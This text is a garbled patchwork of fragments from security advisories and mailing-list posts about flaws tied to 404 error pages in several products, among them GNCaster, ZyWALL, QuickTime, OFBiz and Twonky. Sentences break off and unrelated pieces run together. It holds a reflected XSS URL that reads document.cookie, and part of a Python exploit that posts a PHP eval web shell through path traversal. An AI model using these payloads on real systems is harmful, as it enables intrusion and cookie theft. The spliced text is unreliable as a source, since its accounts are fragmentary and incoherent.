404 error
============
The GNCaster software allows communication with clients through a subset
of the HTTP protocol. If an attacker sends an HTTP GET request for a
nonexistent URL path and the request is less than 988 bytes long, the
server reacts with an HTTP 404 error and the message
File "/AAAAAA[...]AAAA" not found on this server.
If the URL path length is 988 bytes or more, the HTTP 404 error is still
returned but the server thread stops before returning the message above.
Let's try this:
http://localhost/vivvo.4.1.5.1/files.php?file=../conf.php
... and we get 404 error:
Page Not Found
The requested URL was not found on this server.
If you believe this page should be here, please notify administrator.
companies. The ZyWALL 100 features an ICSA certified firewall, IPSec VPN
capability, MultiNAT, web pages content filtering and an embedded web
configurator for easy configuration and management.
ZyWALL web based management interface utilizes referer header for
serving 404 Error pages. The vulnerability can be exploited by
requesting a non-existing web page with a specially crafted referer
header. As the application does not properly sanitize the data contained
in the referer header, desired script code can be run on client browser.
Sample Request:
//////XSS in Neptune Web Server
//404 error page is vulnerable to XSS
//http://www.silver-forge.com/
//
//////Tested on:
//Neptune Web Server 3.0 (Professional Edition)
//
////////Author:
//NetJackal
//http://netjackal.by.ru
the LCD-like screen containing info about the status of the connection.
For exploiting this vulnerability is only needed that an user follows
a rtsp:// link, if the port 554 of the server is closed Quicktime will
automatically change the transport and will try the HTTP protocol on
port 80, the 404 error message of the server (other error numbers are
valid too) will be visualized in the LCD-like screen.
During my tests I have been able to fully overwrite the return address
anyway note that the visible effects of the vulnerability could change
during the usage of the debugger (in attaching mode it's everything
The research is made of two components: a purple paper and a video. The research doesn't just cover boring PoCs, but actual Hollywood-style exploits :-) . Yes, this includes the classic attack in which the legitimate video stream gets replaced by another stream that keeps looping forever!
In the paper we only cover new vulnerabilities affecting older _and_ the latest firmware. The most eye-catching ones are perhaps the following issues affecting the latest version of the firmware (2.43):
System-wide Cross-site Request Forgeries (CSRF) – any admin action can be forged by design!
Non-persistent Cross-site Scripting (XSS) on 404 error pages
Persistent cross-site Scripting (XSS) on the network settings page
Persistent cross-site Scripting (XSS) on the video viewing page
Persistent cross-site Scripting (XSS) on the logs viewing facility
For more info please see: http://www.procheckup.com/Vulnerability_2007.php
8.4 A 404-based Reflected Cross Site Scripting vulnerability was found
on the whole application.
When using the ControlServlet, if an invalid request URI is supplied then
the 404 error page displays the requested URI without first sanitizing it.
The vulnerability can be triggered by clicking on the
following URL:
https://www.ofbiz-example.com/facility/control/ReceiveReturn"<b><body onLoad="alert(document.cookie)"><br><div>><!--
Looks like URLScan blocks this vulnerability by default. I've just tried the URL against one of our old Windows 2000 servers, and it gives me a 404 error.
On Jan 10, 2008, at 7:45 PM, Luigi Auriemma wrote:
> For exploiting this vulnerability is only needed that an user follows
> a rtsp:// link, if the port 554 of the server is closed Quicktime will
> automatically change the transport and will try the HTTP protocol on
> port 80, the 404 error message of the server (other error numbers are
> valid too) will be visualized in the LCD-like screen.
Tried on QuickTime 7.3.10 running on OSX 10.5.1, and the player doesn't
try to connect to port 80 if 554 is closed.
pt = "?"
pt2 = "&"
if ver1 == "no" or ver2 == "no":
transversal = ".."
print "[-]One or more Get request returned 404 error. Trying to continue with / path."
else : transversal = ""
conn = httplib.HTTPConnection(target,port)
conn.request("POST", "%s/index.php%spag=vedipm%sinviapm=true" % (directory,pt,pt2), urllib.urlencode({'to': transversal +'/../<?php eval(stripslashes($_GET[dox])); ?>.paradox-got-this-one.php', 'cont': 1}), {"Accept": "text/plain","Cookie": "rem_user=%2F..%2F; rem_pass=%2Findex;","Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
1st VULNERABILITY:
==================
A HTTP GET request at http://twonky:9000/NON-EXISTENT-PAGE results in
a 404 error page containing:
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not
Found</H1>/NON-EXISTENT-PAGE was not found
on this server.</BODY></HTML>
Woodstock components are User Interface Components for the web, based on Java Server Faces and AJAX.
Woodstock also is part Glassfish Enterprise Server.
Woodstock has linked XSS vulnerability in 404 Error page.
Details
*******
|
